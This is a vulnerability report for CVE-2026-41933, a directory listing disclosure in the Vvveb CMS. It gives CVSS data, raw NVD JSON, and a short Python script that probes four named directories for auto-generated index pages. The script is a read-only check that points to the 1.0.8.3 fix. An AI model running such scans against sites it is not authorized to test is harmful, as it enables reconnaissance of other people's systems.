Security Vulnerability Report
CVE-2026-41933 CVSS 5.3 MEDIUM

CVE-2026-41933

Published: 2026-05-14 15:16:46
Last Modified: 2026-05-14 16:24:56

Description

Vvveb before 1.0.8.3 contains a directory listing information disclosure vulnerability that allows unauthenticated attackers to enumerate files and directories by accessing multiple paths lacking proper index directives in .htaccess files. Attackers can access directories such as admin asset paths, plugins, themes, and media folders to view filenames, file sizes, modification timestamps, and unrendered admin templates containing sensitive route maps.

CVSS Details

CVSS Score (v3.1; the raw record below also carries a CVSS 4.0 base score of 6.9)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Vvveb < 1.0.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
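# Check a Vvveb deployment for the directory listing exposure in CVE-2026-41933.
#
# The advisory attributes the exposure to directories whose .htaccess files
# lack index directives. It is fixed in Vvveb 1.0.8.3; on Apache,
# `Options -Indexes` also turns off auto-generated listings.
import requests

# Directory paths named in the vulnerability description.
VULNERABLE_PATHS = (
    "/admin/assets/",
    "/plugins/",
    "/themes/",
    "/media/",
)

# Strings that auto-generated index pages commonly contain.
LISTING_MARKERS = ("Index of /", "Parent Directory")


def _looks_like_listing(status_code, body):
    """Return True when a response is a successful auto-generated index page."""
    # A bare 200 is not evidence: a directory that serves its own index file,
    # or a redirect that ends on a login page, also answers 200. Require a
    # listing marker in the body as well, otherwise every reachable path is
    # reported as exposed.
    return status_code == 200 and any(marker in body for marker in LISTING_MARKERS)


def check_directory_listing(base_url):
    """Report which of the advisory's directories serve a directory listing.

    Args:
        base_url: Scheme and host of the deployment being verified, with or
            without a trailing slash.

    Returns:
        The list of URLs whose response looked like a directory listing. An
        empty list means no listing was detected on the paths that answered;
        paths that could not be reached are printed and are not part of the
        result.
    """
    # Drop a trailing slash so "http://host/" does not produce "//plugins/".
    root = base_url.rstrip("/")
    exposed = []

    print(f"[*] Scanning {base_url} for CVE-2026-41933...")
    for path in VULNERABLE_PATHS:
        target_url = f"{root}{path}"
        try:
            response = requests.get(target_url, timeout=5)
        except requests.RequestException as e:
            print(f"[!] Error connecting to {target_url}: {e}")
            continue

        if _looks_like_listing(response.status_code, response.text):
            exposed.append(target_url)
            print(f"[+] Potential directory listing found at: {target_url}")
            print(f" Response snippet: {response.text[:100]}...")
        else:
            print(f"[-] No listing detected at: {target_url}")

    return exposed


if __name__ == "__main__":
    target = "http://example.com"  # Replace with the target host
    check_directory_listing(target)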

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41933", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:45.873", "lastModified": "2026-05-14T16:24:56.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb before 1.0.8.3 contains a directory listing information disclosure vulnerability that allows unauthenticated attackers to enumerate files and directories by accessing multiple paths lacking proper index directives in .htaccess files. Attackers can access directories such as admin asset paths, plugins, themes, and media folders to view filenames, file sizes, modification timestamps, and unrendered admin templates containing sensitive route maps."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-548"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/commit/96ae04c5e4a295e281adc1d02d77444173653deb", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/releases/tag/1.0.8.3", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vvveb-directory-listing-information-disclosure", "source": "[email protected]"}]}}